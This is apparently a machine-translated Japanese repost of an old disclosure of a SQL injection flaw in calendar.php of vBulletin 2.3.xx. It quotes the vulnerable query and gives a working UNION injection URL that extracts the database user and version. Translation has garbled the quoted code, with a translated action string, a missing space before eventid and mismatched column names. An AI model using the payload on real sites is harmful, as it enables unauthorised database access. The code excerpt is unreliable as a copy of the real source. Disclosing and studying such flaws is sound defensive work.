vBulletinForum2.3.xxSQLInjection_PHP チュートリアル
- WBOYオリジナル
- 2016-07-13 17:12:281095ブラウズ
vBulletin フォーラム 2.3.xx SQL インジェクション
calendar.php.に SQL インジェクションの問題があります
-------- Calendar.php の 585 行目からの抜粋 ----------
else if ($action == "編集")
{
$eventinfo = $DB_site->query_first("SELECT allowedmilies,public,userid,
eventdate,event,subject FROM Calendar_events WHEREeventid = $eventid");
--- --------------------------------------------------
MySQL バージョンが 4.00 より大きい場合、UNION 攻撃が使用される可能性があります。
-------------------------------- --------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0 ',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
------- -----------------------
query_first 関数はクエリ結果の最初の行のみを返すため、!
必要な行を返すようにしてください。
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。